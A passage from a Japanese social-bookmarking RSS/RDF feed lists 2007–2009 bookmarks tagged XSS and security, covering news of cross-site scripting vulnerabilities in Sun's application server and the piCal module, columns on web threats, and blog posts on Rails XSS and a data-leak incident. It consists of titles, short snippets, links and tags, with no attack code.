   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/php"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.zdnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056194%2C20393133%2C00.htm&amp;title=Sun%E8%A3%BD%E3%82%A2%E3%83%97%E3%83%AA%E3%82%B1%E3%83%BC%E3%82%B7%E3%83%A7%E3%83%B3%E3%82%B5%E3%83%BC%E3%83%90%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%20-%20%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%20-%20ZDNet%20Japan">
 <title>Sun製アプリケーションサーバにクロスサイトスクリプティングの脆弱性 - セキュリティ - ZDNet Japan</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.zdnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056194%2C20393133%2C00.htm&amp;title=Sun%E8%A3%BD%E3%82%A2%E3%83%97%E3%83%AA%E3%82%B1%E3%83%BC%E3%82%B7%E3%83%A7%E3%83%B3%E3%82%B5%E3%83%BC%E3%83%90%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%20-%20%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%20-%20ZDNet%20Japan</link>
 
  
   <description>
     <![CDATA[
       ZDNet Japan Brand Site:ZDNet Japanbuilder検索：ZDNetbuilderRSSサイトマップ CNET_IDログインZDNet Japanトップビジネスインダストリトピック金融製造公共小売物流通信ネットビジネスマネジメントトピック財務人事マネジメントキャリア・転職メンタルヘルスビジネストピックユーザー事例業界動向英語資格・学習テクノロジーテクノロジートレンドセキュリティガバナンス・運用管理Notesの次を考えるソーシャルテクノロジ経営が知るべきバズワード新しいOSの選択肢これはひどい！ITの話デベロッパーbuilder by ZDNet Japanホワイトペーパー製品用語企業動向ビジネスリソースプレスリリースイベント情報企業情報センターリファレンスダッシュボード インフォメーションZDNet Japanのイベントサイトマップニュース &raquo; セキュリティSun製アプリケーションサーバにクロスサイトスクリプティングの脆弱性IPA/ISECおよびJPCERT/CCは、サン・マイクロシステムズのアプリケーションサーバにクロスサイトスクリプティングの脆弱性が存在すると公表...
       <a href="http://japan.zdnet.com/news/sec/story/0,2000056194,20393133,00.htm">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fjapan.zdnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056194%2C20393133%2C00.htm&amp;title=Sun%E8%A3%BD%E3%82%A2%E3%83%97%E3%83%AA%E3%82%B1%E3%83%BC%E3%82%B7%E3%83%A7%E3%83%B3%E3%82%B5%E3%83%BC%E3%83%90%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%20-%20%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3%20-%20ZDNet%20Japan">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://japan.zdnet.com/news/sec/story/0,2000056194,20393133,00.htm</dc:source>
 <dc:identifier>893373</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2009-05-15T09:11:30Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>java</dc:subject>
 <dc:subject>sun</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>applicationserver</dc:subject>
 <dc:subject>glassfish</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/java"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/sun"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/applicationserver"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/glassfish"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FCOLUMN%2F20070307%2F264134%2F&amp;title=%E7%AC%AC3%E5%9B%9E%E3%80%80Web%202.0%E3%81%A7%E4%BA%8B%E6%85%8B%E3%81%8C%E6%82%AA%E5%8C%96%EF%BC%9AITpro">
 <title>第3回　Web 2.0で事態が悪化：ITpro</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FCOLUMN%2F20070307%2F264134%2F&amp;title=%E7%AC%AC3%E5%9B%9E%E3%80%80Web%202.0%E3%81%A7%E4%BA%8B%E6%85%8B%E3%81%8C%E6%82%AA%E5%8C%96%EF%BC%9AITpro</link>
 
  
   <description>
     <![CDATA[
       <br /><br />セキュリティ・ホール＆ウイルスCSIRTフォーラムWebの脅威 <br />　ITpro ＞ セキュリティITproの最新ニュースを<br />RSSで配信しています『Windows Server 2008』の<br />最新技術，管理/活用情報はこちら<br />Web 2.0は危険がいっぱい<br />第3回　Web 2.0で事態が悪化<br />前回ではWeb 2...
       <a href="http://itpro.nikkeibp.co.jp/article/COLUMN/20070307/264134/">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FCOLUMN%2F20070307%2F264134%2F&amp;title=%E7%AC%AC3%E5%9B%9E%E3%80%80Web%202.0%E3%81%A7%E4%BA%8B%E6%85%8B%E3%81%8C%E6%82%AA%E5%8C%96%EF%BC%9AITpro">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://itpro.nikkeibp.co.jp/article/COLUMN/20070307/264134/</dc:source>
 <dc:identifier>64400</dc:identifier>
 <dc:creator>bookey</dc:creator>
 <dc:date>2007-03-15T01:36:47Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>javascript</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>computer</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/javascript"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/computer"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FCOLUMN%2F20070409%2F267808%2F&amp;title=%E5%AF%BE%E7%AD%96%E9%81%85%E3%82%89%E3%81%9B%E3%82%8BHTML%E3%82%A8%E3%83%B3%E3%82%B3%E3%83%BC%E3%83%87%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E3%80%8C%E7%A5%9E%E8%A9%B1%E3%80%8D%EF%BC%9AITpro">
 <title>対策遅らせるHTMLエンコーディングの「神話」：ITpro</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FCOLUMN%2F20070409%2F267808%2F&amp;title=%E5%AF%BE%E7%AD%96%E9%81%85%E3%82%89%E3%81%9B%E3%82%8BHTML%E3%82%A8%E3%83%B3%E3%82%B3%E3%83%BC%E3%83%87%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E3%80%8C%E7%A5%9E%E8%A9%B1%E3%80%8D%EF%BC%9AITpro</link>
 
  
   <description>
     <![CDATA[
       <br /><br />セキュリティ・ホール＆ウイルスCSIRTフォーラムWebの脅威 <br />　ITpro ＞ セキュリティITproの最新ニュースを<br />RSSで配信しています『Windows Server 2008』の<br />最新技術，管理/活用情報はこちら<br />狙われるWebアプリケーション<br />対策遅らせるHTMLエンコーディングの「神話」<br /><br />狙われ...
       <a href="http://itpro.nikkeibp.co.jp/article/COLUMN/20070409/267808/">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fitpro.nikkeibp.co.jp%2Farticle%2FCOLUMN%2F20070409%2F267808%2F&amp;title=%E5%AF%BE%E7%AD%96%E9%81%85%E3%82%89%E3%81%9B%E3%82%8BHTML%E3%82%A8%E3%83%B3%E3%82%B3%E3%83%BC%E3%83%87%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E3%80%8C%E7%A5%9E%E8%A9%B1%E3%80%8D%EF%BC%9AITpro">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://itpro.nikkeibp.co.jp/article/COLUMN/20070409/267808/</dc:source>
 <dc:identifier>70825</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2007-04-10T15:09:41Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>html</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>computer</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>encoding</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/html"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/computer"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/encoding"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.atmarkit.co.jp%2Ffcoding%2Farticles%2Fwebapp%2F03%2Fwebapp03a.html&amp;title=%EF%BC%BB%E6%9F%94%E8%BB%9F%E3%81%99%E3%81%8E%E3%82%8B%EF%BC%BDIE%E3%81%AECSS%E8%A7%A3%E9%87%88%E3%81%A7%E8%B5%B7%E3%81%93%E3%82%8BXSS%20%EF%BC%8D%20%EF%BC%A0IT">
 <title>［柔軟すぎる］IEのCSS解釈で起こるXSS － ＠IT</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.atmarkit.co.jp%2Ffcoding%2Farticles%2Fwebapp%2F03%2Fwebapp03a.html&amp;title=%EF%BC%BB%E6%9F%94%E8%BB%9F%E3%81%99%E3%81%8E%E3%82%8B%EF%BC%BDIE%E3%81%AECSS%E8%A7%A3%E9%87%88%E3%81%A7%E8%B5%B7%E3%81%93%E3%82%8BXSS%20%EF%BC%8D%20%EF%BC%A0IT</link>
 
  
   <description>
     <![CDATA[
       ＠IT＠IT テクノロジー＠IT情報マネジメント＠IT MONOist＠IT自分戦略研究所JOB＠ITITmediaTechTarget誠  ＠IT総合トップ &gt; テクノロジー &gt; ［柔軟すぎる］IEのCSS解釈で起こるXSS    第3回　［柔軟すぎる］IEのCSS解釈で起こるXSSはせがわようすけ<br />  ネットエージェント株式会社2009/6/4XSSにCSRFにSQLインジェクションにディレクトリトラバーサル……Webアプリケーションのプログラマが知っておくべき脆弱性はいっぱいあります。そこで本連載では、そのようなメジャーなもの“以外”も掘り下げていきます （編集部） なぜか奥深いIEのXSSの話- PR -  　皆さんこんにちは、はせがわようすけです。　第1回「［これはひどい］IEの引用符の解釈」と第2回「［無視できない］IEのContent-Type無視」でInternet  Explorer(IE)の独自の機能がクロスサイトスクリプティング（XSS：cross-site scripting）を引き起こす可能性があるということについて説明してきました。　第3回でも引き続き、IE特有の機能がX...
       <a href="http://www.atmarkit.co.jp/fcoding/articles/webapp/03/webapp03a.html">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fwww.atmarkit.co.jp%2Ffcoding%2Farticles%2Fwebapp%2F03%2Fwebapp03a.html&amp;title=%EF%BC%BB%E6%9F%94%E8%BB%9F%E3%81%99%E3%81%8E%E3%82%8B%EF%BC%BDIE%E3%81%AECSS%E8%A7%A3%E9%87%88%E3%81%A7%E8%B5%B7%E3%81%93%E3%82%8BXSS%20%EF%BC%8D%20%EF%BC%A0IT">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://www.atmarkit.co.jp/fcoding/articles/webapp/03/webapp03a.html</dc:source>
 <dc:identifier>953531</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2009-06-04T13:23:39Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>css</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>internetexplorer</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/css"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internetexplorer"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.kajisoku.net%2F1%2Farchives%2Feid272.html&amp;title=%E2%8A%82%E2%8C%92%E2%8A%83%EF%BD%A1%D0%94%EF%BD%A1%29%E2%8A%83%E3%82%AB%E3%82%B8%E9%80%9F%E2%89%A1%E2%89%A1%E2%89%A1%E2%8A%82%E2%8C%92%E3%81%A4%EF%BE%9F%D0%94%EF%BE%9F%29%E3%81%A4Full%20Auto%20%7C%20%E3%82%BB%E3%83%96%E3%83%B3%E3%82%A2%E3%83%B3%E3%83%89%E3%83%AF%E3%82%A4%E3%80%81Google%E6%A4%9C%E7%B4%A2%E3%81%A7%E5%80%8B%E4%BA%BA%E6%83%85%E5%A0%B1%E3%81%8C%E4%B8%B8%E8%A6%8B%E3%81%88%E3%81%A0%E3%81%A3%E3%81%9F%E6%A8%A1%E6%A7%98%E3%80%82%E3%81%BE%E3%81%9F%E4%BB%8A%E5%9B%9E%E3%81%AE%E4%BB%B6%E3%81%A7%E3%82%A2%E3%83%95%E3%82%A3%E3%83%AA%E3%82%A8%E3%82%A4%E3%83%88%E3%81%AB%E3%81%BE%E3%81%A7%E5%BD%B1%E9%9F%BF%E3%81%8C%E5%87%BA%E3%82%8B%E3%80%82">
 <title>⊂⌒⊃｡Д｡)⊃カジ速≡≡≡⊂⌒つﾟДﾟ)つFull Auto | セブンアンドワイ、Google検索で個人情報が丸見えだった模様。また今回の件でアフィリエイトにまで影響が出る。</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fwww.kajisoku.net%2F1%2Farchives%2Feid272.html&amp;title=%E2%8A%82%E2%8C%92%E2%8A%83%EF%BD%A1%D0%94%EF%BD%A1%29%E2%8A%83%E3%82%AB%E3%82%B8%E9%80%9F%E2%89%A1%E2%89%A1%E2%89%A1%E2%8A%82%E2%8C%92%E3%81%A4%EF%BE%9F%D0%94%EF%BE%9F%29%E3%81%A4Full%20Auto%20%7C%20%E3%82%BB%E3%83%96%E3%83%B3%E3%82%A2%E3%83%B3%E3%83%89%E3%83%AF%E3%82%A4%E3%80%81Google%E6%A4%9C%E7%B4%A2%E3%81%A7%E5%80%8B%E4%BA%BA%E6%83%85%E5%A0%B1%E3%81%8C%E4%B8%B8%E8%A6%8B%E3%81%88%E3%81%A0%E3%81%A3%E3%81%9F%E6%A8%A1%E6%A7%98%E3%80%82%E3%81%BE%E3%81%9F%E4%BB%8A%E5%9B%9E%E3%81%AE%E4%BB%B6%E3%81%A7%E3%82%A2%E3%83%95%E3%82%A3%E3%83%AA%E3%82%A8%E3%82%A4%E3%83%88%E3%81%AB%E3%81%BE%E3%81%A7%E5%BD%B1%E9%9F%BF%E3%81%8C%E5%87%BA%E3%82%8B%E3%80%82</link>
 
  
   <description>
     <![CDATA[
         48 ：以下、名無しにかわりましてVIPがお送りします [sage] ：2009/12/14(月) 21:12:46.97 ID:4HBWL6wX0  951　おかいものさん　sage　2009/12/14(月) 21:08:35 <BR>  ...
       <a href="http://www.kajisoku.net/1/archives/eid272.html">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fwww.kajisoku.net%2F1%2Farchives%2Feid272.html&amp;title=%E2%8A%82%E2%8C%92%E2%8A%83%EF%BD%A1%D0%94%EF%BD%A1%29%E2%8A%83%E3%82%AB%E3%82%B8%E9%80%9F%E2%89%A1%E2%89%A1%E2%89%A1%E2%8A%82%E2%8C%92%E3%81%A4%EF%BE%9F%D0%94%EF%BE%9F%29%E3%81%A4Full%20Auto%20%7C%20%E3%82%BB%E3%83%96%E3%83%B3%E3%82%A2%E3%83%B3%E3%83%89%E3%83%AF%E3%82%A4%E3%80%81Google%E6%A4%9C%E7%B4%A2%E3%81%A7%E5%80%8B%E4%BA%BA%E6%83%85%E5%A0%B1%E3%81%8C%E4%B8%B8%E8%A6%8B%E3%81%88%E3%81%A0%E3%81%A3%E3%81%9F%E6%A8%A1%E6%A7%98%E3%80%82%E3%81%BE%E3%81%9F%E4%BB%8A%E5%9B%9E%E3%81%AE%E4%BB%B6%E3%81%A7%E3%82%A2%E3%83%95%E3%82%A3%E3%83%AA%E3%82%A8%E3%82%A4%E3%83%88%E3%81%AB%E3%81%BE%E3%81%A7%E5%BD%B1%E9%9F%BF%E3%81%8C%E5%87%BA%E3%82%8B%E3%80%82">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://www.kajisoku.net/1/archives/eid272.html</dc:source>
 <dc:identifier>1809782</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2009-12-16T09:33:38Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>情報漏洩</dc:subject>
 <dc:subject>business</dc:subject>
 <dc:subject>trouble</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>sqlinjection</dc:subject>
 <dc:subject>incident</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/%E6%83%85%E5%A0%B1%E6%BC%8F%E6%B4%A9"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/business"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/trouble"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/sqlinjection"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/incident"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2FHamachiya2%2F20080804%2Fsecurity&amp;title=%E5%80%8B%E4%BA%BA%E3%81%A0%E3%81%8B%E3%82%89%E7%94%98%E3%81%84%E3%81%AE%E3%81%8B%E3%81%AA%20-%20%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81%28Hatena%29">
 <title>個人だから甘いのかな - ぼくはまちちゃん！(Hatena)</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2FHamachiya2%2F20080804%2Fsecurity&amp;title=%E5%80%8B%E4%BA%BA%E3%81%A0%E3%81%8B%E3%82%89%E7%94%98%E3%81%84%E3%81%AE%E3%81%8B%E3%81%AA%20-%20%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81%28Hatena%29</link>
 
  
   <description>
     <![CDATA[
       あらあら予告inがXSSやられちゃったらしいですね！    使い古された手法？ いまどきエスケープ処理すらしてなくてダサい？    関連の記事に対して、はてなブックマークでも色々言われていたり、 http://b.hatena.ne.jp/t/%E4%BA%88%E5%91%8A.in?threshold=1    ニュースサイトでも、こんな煽り記事を書かれていたりするけれど…    今回の件についてIT企業に勤めるエンジニアに聞いてみると、 「これは初歩中の初歩。XSSコード書いた方も10分も掛かって ...
       <a href="http://d.hatena.ne.jp/Hamachiya2/20080804/security">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fd.hatena.ne.jp%2FHamachiya2%2F20080804%2Fsecurity&amp;title=%E5%80%8B%E4%BA%BA%E3%81%A0%E3%81%8B%E3%82%89%E7%94%98%E3%81%84%E3%81%AE%E3%81%8B%E3%81%AA%20-%20%E3%81%BC%E3%81%8F%E3%81%AF%E3%81%BE%E3%81%A1%E3%81%A1%E3%82%83%E3%82%93%EF%BC%81%28Hatena%29">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://d.hatena.ne.jp/Hamachiya2/20080804/security</dc:source>
 <dc:identifier>421628</dc:identifier>
 <dc:creator>bookey</dc:creator>
 <dc:date>2008-08-04T13:56:15Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>csrf</dc:subject>
 <dc:subject>internet</dc:subject>
 <dc:subject>summarysite</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/csrf"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/internet"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/summarysite"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20388926%2C00.htm&amp;title=PEAK%20XOOPS%E8%A3%BD%E3%80%8CpiCal%E3%80%8D%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan">
 <title>PEAK XOOPS製「piCal」にクロスサイトスクリプティングの脆弱性:ニュース - CNET Japan</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20388926%2C00.htm&amp;title=PEAK%20XOOPS%E8%A3%BD%E3%80%8CpiCal%E3%80%8D%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan</link>
 
  
   <description>
     <![CDATA[
       　独立行政法人情報処理推進機構セキュリティセンター（IPA/ISEC）および有限責任中間法人JPCERTコーディネーションセンター（JPCERT/CC）は2月25日、PEAK XOOPS製のXOOPS用スケジューラ付きカレンダーモジュール「piCal」にクロスサイトスクリプティングの脆弱性が存在する...
       <a href="http://japan.cnet.com/news/sec/story/0,2000056024,20388926,00.htm">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fjapan.cnet.com%2Fnews%2Fsec%2Fstory%2F0%2C2000056024%2C20388926%2C00.htm&amp;title=PEAK%20XOOPS%E8%A3%BD%E3%80%8CpiCal%E3%80%8D%E3%81%AB%E3%82%AF%E3%83%AD%E3%82%B9%E3%82%B5%E3%82%A4%E3%83%88%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%97%E3%83%86%E3%82%A3%E3%83%B3%E3%82%B0%E3%81%AE%E8%84%86%E5%BC%B1%E6%80%A7%3A%E3%83%8B%E3%83%A5%E3%83%BC%E3%82%B9%20-%20CNET%20Japan">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://japan.cnet.com/news/sec/story/0,2000056024,20388926,00.htm</dc:source>
 <dc:identifier>715718</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2009-02-26T10:04:05Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>xoops</dc:subject>
 <dc:subject>xss</dc:subject>
 <dc:subject>pical</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/security"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xoops"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/xss"/>
   <rdf:li rdf:resource="http://clip.nifty.com/tag/pical"/>
  </rdf:Bag>
 </taxo:topics>
</item>

<item rdf:about="http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2FIwamotoTakashi%2F20090927%2Fp1&amp;title=XSS%E5%AF%BE%E7%AD%96%E3%83%91%E3%83%83%E3%83%81%E3%82%92%E5%BD%93%E3%81%A6%E3%81%A6%E3%82%82Rails%E3%81%AB%E6%AE%8B%E3%82%8B%E8%84%86%E5%BC%B1%E6%80%A7%20-%20%E5%B2%A9%E6%9C%AC%E9%9A%86%E5%8F%B2%E3%81%AE%E6%97%A5%E8%A8%98%E5%B8%B3">
 <title>XSS対策パッチを当ててもRailsに残る脆弱性 - 岩本隆史の日記帳</title>
  <link>http://clip.nifty.com/entry?url=http%3A%2F%2Fd.hatena.ne.jp%2FIwamotoTakashi%2F20090927%2Fp1&amp;title=XSS%E5%AF%BE%E7%AD%96%E3%83%91%E3%83%83%E3%83%81%E3%82%92%E5%BD%93%E3%81%A6%E3%81%A6%E3%82%82Rails%E3%81%AB%E6%AE%8B%E3%82%8B%E8%84%86%E5%BC%B1%E6%80%A7%20-%20%E5%B2%A9%E6%9C%AC%E9%9A%86%E5%8F%B2%E3%81%AE%E6%97%A5%E8%A8%98%E5%B8%B3</link>
 
  
   <description>
     <![CDATA[
       どのような脆弱性か先日書いた「Rails 2系のXSS脆弱性がRuby 1.9では影響なしとされる理由」という記事に、奥さん（id:kazuhooku）より、下記のブックマークコメントをいただきました。たとえばブログの場合、誰かに壊れたUT...
       <a href="http://d.hatena.ne.jp/IwamotoTakashi/20090927/p1">
       <img src="http://clip.nifty.com/images/icn_moretxt.gif" alt="続きを読む" border="0" align="middle" />続きを読む</a>  <p>
       <a href="http://clip.nifty.com/create?url=http%3A%2F%2Fd.hatena.ne.jp%2FIwamotoTakashi%2F20090927%2Fp1&amp;title=XSS%E5%AF%BE%E7%AD%96%E3%83%91%E3%83%83%E3%83%81%E3%82%92%E5%BD%93%E3%81%A6%E3%81%A6%E3%82%82Rails%E3%81%AB%E6%AE%8B%E3%82%8B%E8%84%86%E5%BC%B1%E6%80%A7%20-%20%E5%B2%A9%E6%9C%AC%E9%9A%86%E5%8F%B2%E3%81%AE%E6%97%A5%E8%A8%98%E5%B8%B3">
	   <img src="http://clip.nifty.com/images/addclip_icn.gif" alt="クリップへ追加する" border="0" align="middle" />クリップへ追加する</a></p>]]>
   </description>
  
  
  
 
 <dc:source>http://d.hatena.ne.jp/IwamotoTakashi/20090927/p1</dc:source>
 <dc:identifier>1590937</dc:identifier>
 <dc:creator>tsupo</dc:creator>
 <dc:date>2009-09-28T15:51:18Z</dc:date>
 <dc:subject>security</dc:subject>
 <dc:subject>ruby</dc:subject>
 <dc:subject>technology</dc:subject>
 <dc:subject>utf-8</dc:subject>
 <dc:subject>summarysite</dc:subject>
 <dc:subject>rails</dc:subject>
 <dc:subject>xss</dc:subject>
 
 <taxo:topics>
  <rdf:Bag>
